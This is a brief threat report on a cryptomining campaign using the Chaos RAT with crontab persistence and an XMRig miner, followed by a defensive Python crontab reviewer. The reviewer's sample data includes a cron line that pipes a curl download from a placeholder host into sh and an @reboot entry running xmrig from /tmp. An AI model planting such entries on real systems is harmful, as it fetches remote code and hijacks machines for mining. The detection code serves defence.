A cryptocurrency mining operation was discovered incorporating the Chaos Remote Administrative Tool into its arsenal.
The malicious software alters the crontab file to maintain persistence and downloads an XMRig miner onto infected devices.
To remain active and spread to as many devices as possible, the operators host the main downloader script and further payloads in different locations.
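Because persistence here runs through the crontab, reviewing cron entries is a natural triage step. The following is an added example, not code from the report: a small crontab reviewer whose heuristics (download piped to a shell, miner keywords, execution from world-writable directories) and sample entries are assumptions constructed for illustration, not indicators from this campaign.

```python
import re

# Triage heuristics (assumptions for illustration, not IoCs from the report).
FETCH = re.compile(r"\b(curl|wget)\b", re.I)
PIPE_SHELL = re.compile(r"\|\s*(ba|da|z)?sh\b")
MINER = re.compile(r"xmrig|stratum\+tcp://", re.I)
WRITABLE = re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/")

def cron_command(line, system=False):
    """Return the command of a crontab entry, or None for comments/env lines.
    system=True handles /etc/crontab style entries that carry a user field."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"\w+\s*=", line):
        return None
    fields = 1 if line.startswith("@") else 5   # @reboot etc. vs five time fields
    if system:
        fields += 1                             # extra user column
    parts = line.split(None, fields)
    return parts[-1] if len(parts) == fields + 1 else None

def review(text, system=False):
    """Return [(line_number, [reasons])] for entries worth a closer look."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = cron_command(line, system)
        if cmd is None:
            continue
        reasons = []
        if FETCH.search(cmd) and PIPE_SHELL.search(cmd):
            reasons.append("download piped to shell")
        if MINER.search(cmd):
            reasons.append("miner keyword")
        if WRITABLE.search(cmd):
            reasons.append("runs from world-writable dir")
        if reasons:
            findings.append((n, reasons))
    return findings

# Constructed sample crontab; hosts and paths are placeholders.
SAMPLE = """\
# constructed sample crontab, not taken from the report
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://downloader.example.invalid/d.sh | sh
@reboot /tmp/.cache/xmrig --config /tmp/.cache/c.json
"""

if __name__ == "__main__":
    for lineno, reasons in review(SAMPLE):
        print(f"line {lineno}: {', '.join(reasons)}")
```

On a live host, feed it the output of `crontab -l` for each user and, with `system=True`, the contents of `/etc/crontab` and the files under `/etc/cron.d/`.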